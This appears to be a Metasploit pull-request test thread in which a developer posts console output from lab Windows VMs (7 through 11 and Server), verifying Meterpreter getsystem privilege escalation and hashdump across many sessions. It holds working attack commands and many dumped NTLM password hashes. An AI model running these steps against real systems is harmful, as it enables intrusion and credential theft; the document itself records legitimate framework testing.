lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:eaa652f45490d2779b30aa0aeb8808eb::: [*] Running 'hashdump' on meterpreter session 25 (10.5.134.162) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1010:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1006:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1008:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1013:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1016:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1007:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1009:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1015:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1005:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1014:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1011:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1017:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1012:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1003:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1004:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Running 'hashdump' on meterpreter session 26 (10.5.134.148) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1010:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1006:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1008:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1013:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1016:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1007:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1009:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1015:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1005:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1014:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1011:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1017:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1012:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1003:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1004:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Running 'hashdump' on meterpreter session 27 (10.5.134.144) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Running 'hashdump' on meterpreter session 28 (10.5.134.133) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:68a2e28163bf0d5b71f8c29d6854fe14::: [*] Running 'hashdump' on meterpreter session 29 (10.5.134.117) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:4f7edbd6c1a8dcce95bc7a2eaaea4e7d::: [*] Running 'hashdump' on meterpreter session 30 (10.5.134.109) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1010:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1006:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1008:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1013:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1016:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1007:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1009:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1015:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1005:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1014:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1011:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1017:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1012:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1003:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1004:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: msf6 exploit(windows/smb/psexec) > ```

bwatters-r7 commented 10 months ago

:green_circle: Windows 7-8 x86

``` msf6 payload(windows/meterpreter/reverse_tcp) > sessions -C sysinfo [*] Running 'sysinfo' on meterpreter session 36 (10.5.132.196) Computer : WIN8X86 OS : Windows 8 (6.2 Build 9200). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 37 (10.5.132.186) Computer : WIN81X86 OS : Windows 8.1 (6.3 Build 9600). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 38 (10.5.134.166) Computer : WIN7X86-SP1 OS : Windows 7 (6.1 Build 7601, Service Pack 1). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 39 (10.5.134.134) Computer : WIN7X86-SP0 OS : Windows 7 (6.1 Build 7600). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows msf6 payload(windows/meterpreter/reverse_tcp) > sessions -C getuid [*] Running 'getuid' on meterpreter session 36 (10.5.132.196) Server username: WIN8X86\msfuser [*] Running 'getuid' on meterpreter session 37 (10.5.132.186) Server username: WIN81X86\msfuser [*] Running 'getuid' on meterpreter session 38 (10.5.134.166) Server username: WIN7X86-SP1\msfuser [*] Running 'getuid' on meterpreter session 39 (10.5.134.134) Server username: WIN7X86-SP0\msfuser msf6 payload(windows/meterpreter/reverse_tcp) > sessions -C getsystem [*] Running 'getsystem' on meterpreter session 36 (10.5.132.196) WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/elevator.x86.dll is being used ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). [*] Running 'getsystem' on meterpreter session 37 (10.5.132.186) WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/elevator.x86.dll is being used ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). [*] Running 'getsystem' on meterpreter session 38 (10.5.134.166) WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/elevator.x86.dll is being used ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). [*] Running 'getsystem' on meterpreter session 39 (10.5.134.134) WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/elevator.x86.dll is being used ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). msf6 payload(windows/meterpreter/reverse_tcp) > sessions -C hashdump [*] Running 'hashdump' on meterpreter session 36 (10.5.132.196) Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: msfuser:1001:aad3b435b51404eeaad3b435b51404ee:28c81ace30d1ccf5a8205506f782b73e::: [*] Running 'hashdump' on meterpreter session 37 (10.5.132.186) Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: msfuser:1001:aad3b435b51404eeaad3b435b51404ee:28c81ace30d1ccf5a8205506f782b73e::: [*] Running 'hashdump' on meterpreter session 38 (10.5.134.166) Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: msfuser:1000:aad3b435b51404eeaad3b435b51404ee:28c81ace30d1ccf5a8205506f782b73e::: [*] Running 'hashdump' on meterpreter session 39 (10.5.134.134) Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: msfuser:1000:aad3b435b51404eeaad3b435b51404ee:28c81ace30d1ccf5a8205506f782b73e::: msf6 payload(windows/meterpreter/reverse_tcp) > ```

bwatters-r7 commented 10 months ago

:green_circle: Windows 7-8 x64

```

Windows 7-8 x64 WOW64

``` msf6 payload(windows/meterpreter/reverse_tcp) > sessions -C sysinfo [*] Running 'sysinfo' on meterpreter session 52 (10.5.132.128) Computer : WIN8X64 OS : Windows 8 (6.2 Build 9200). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 53 (10.5.132.128) Computer : WIN8X64 OS : Windows 8 (6.2 Build 9200). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 54 (10.5.134.131) Computer : WIN81X64 OS : Windows 8.1 (6.3 Build 9600). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 55 (10.5.134.131) Computer : WIN81X64 OS : Windows 8.1 (6.3 Build 9600). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 56 (10.5.134.161) Computer : WIN7X64-SP1 OS : Windows 7 (6.1 Build 7601, Service Pack 1). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 57 (10.5.134.161) Computer : WIN7X64-SP1 OS : Windows 7 (6.1 Build 7601, Service Pack 1). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 58 (10.5.134.178) Computer : WIN7X64-SP0 OS : Windows 7 (6.1 Build 7600). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 59 (10.5.134.178) Computer : WIN7X64-SP0 OS : Windows 7 (6.1 Build 7600). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows msf6 payload(windows/meterpreter/reverse_tcp) > sessions -C getuid [*] Running 'getuid' on meterpreter session 52 (10.5.132.128) Server username: WIN8X64\msfuser [*] Running 'getuid' on meterpreter session 53 (10.5.132.128) Server username: WIN8X64\msfuser [*] Running 'getuid' on meterpreter session 54 (10.5.134.131) Server username: WIN81X64\msfuser [*] Running 'getuid' on meterpreter session 55 (10.5.134.131) Server username: WIN81X64\msfuser [*] Running 'getuid' on meterpreter session 56 (10.5.134.161) Server username: WIN7X64-SP1\msfuser [*] Running 'getuid' on meterpreter session 57 (10.5.134.161) Server username: WIN7X64-SP1\msfuser [*] Running 'getuid' on meterpreter session 58 (10.5.134.178) Server username: WIN7X64-SP0\msfuser [*] Running 'getuid' on meterpreter session 59 (10.5.134.178) Server username: WIN7X64-SP0\msfuser msf6 payload(windows/meterpreter/reverse_tcp) > sessions -C getsystem [*] Running 'getsystem' on meterpreter session 52 (10.5.132.128) WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/elevator.x64.dll is being used ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). [*] Running 'getsystem' on meterpreter session 53 (10.5.132.128) WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/elevator.x86.dll is being used ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). [*] Running 'getsystem' on meterpreter session 54 (10.5.134.131) WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/elevator.x64.dll is being used ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). [*] Running 'getsystem' on meterpreter session 55 (10.5.134.131) WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/elevator.x86.dll is being used ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). [*] Running 'getsystem' on meterpreter session 56 (10.5.134.161) WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/elevator.x64.dll is being used ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). [*] Running 'getsystem' on meterpreter session 57 (10.5.134.161) WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/elevator.x86.dll is being used ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). [*] Running 'getsystem' on meterpreter session 58 (10.5.134.178) WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/elevator.x64.dll is being used ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). [*] Running 'getsystem' on meterpreter session 59 (10.5.134.178) WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/elevator.x86.dll is being used ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). msf6 payload(windows/meterpreter/reverse_tcp) > sessions -C hashdump [*] Running 'hashdump' on meterpreter session 52 (10.5.132.128) Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: msfuser:1001:aad3b435b51404eeaad3b435b51404ee:28c81ace30d1ccf5a8205506f782b73e::: [*] Running 'hashdump' on meterpreter session 53 (10.5.132.128) Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: msfuser:1001:aad3b435b51404eeaad3b435b51404ee:28c81ace30d1ccf5a8205506f782b73e::: [*] Running 'hashdump' on meterpreter session 54 (10.5.134.131) Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: msfuser:1001:aad3b435b51404eeaad3b435b51404ee:28c81ace30d1ccf5a8205506f782b73e::: [*] Running 'hashdump' on meterpreter session 55 (10.5.134.131) Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: msfuser:1001:aad3b435b51404eeaad3b435b51404ee:28c81ace30d1ccf5a8205506f782b73e::: [*] Running 'hashdump' on meterpreter session 56 (10.5.134.161) Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: msfuser:1000:aad3b435b51404eeaad3b435b51404ee:28c81ace30d1ccf5a8205506f782b73e::: [*] Running 'hashdump' on meterpreter session 57 (10.5.134.161) Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: msfuser:1000:aad3b435b51404eeaad3b435b51404ee:28c81ace30d1ccf5a8205506f782b73e::: [*] Running 'hashdump' on meterpreter session 58 (10.5.134.178) Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: msfuser:1000:aad3b435b51404eeaad3b435b51404ee:28c81ace30d1ccf5a8205506f782b73e::: [*] Running 'hashdump' on meterpreter session 59 (10.5.134.178) Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: msfuser:1000:aad3b435b51404eeaad3b435b51404ee:28c81ace30d1ccf5a8205506f782b73e::: msf6 payload(windows/meterpreter/reverse_tcp) > ```

bwatters-r7 commented 10 months ago

:green_circle: Windows 11

``` msf6 payload(windows/meterpreter/reverse_tcp) > sessions -C sysinfo [*] Running 'sysinfo' on meterpreter session 64 (10.5.132.136) Computer : DESKTOP-7M0LC28 OS : Windows 11 (10.0 Build 22000). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 65 (10.5.132.136) Computer : DESKTOP-7M0LC28 OS : Windows 11 (10.0 Build 22000). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows msf6 payload(windows/meterpreter/reverse_tcp) > sessions -C getsystem [*] Running 'getsystem' on meterpreter session 64 (10.5.132.136) WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/elevator.x64.dll is being used ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). [*] Running 'getsystem' on meterpreter session 65 (10.5.132.136) WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/elevator.x86.dll is being used ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). msf6 payload(windows/meterpreter/reverse_tcp) > sessions -C getuid [*] Running 'getuid' on meterpreter session 64 (10.5.132.136) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 65 (10.5.132.136) Server username: NT AUTHORITY\SYSTEM msf6 payload(windows/meterpreter/reverse_tcp) > sessions -C hashdump [*] Running 'hashdump' on meterpreter session 64 (10.5.132.136) Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: msfuser:1001:aad3b435b51404eeaad3b435b51404ee:28c81ace30d1ccf5a8205506f782b73e::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:06d47c1ac5ca3719f19e7d67ae43ca21::: [*] Running 'hashdump' on meterpreter session 65 (10.5.132.136) Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: msfuser:1001:aad3b435b51404eeaad3b435b51404ee:28c81ace30d1ccf5a8205506f782b73e::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:06d47c1ac5ca3719f19e7d67ae43ca21::: msf6 payload(windows/meterpreter/reverse_tcp) > ```

bwatters-r7 commented 10 months ago

:green_circle: Windows Kernel 10 Servers

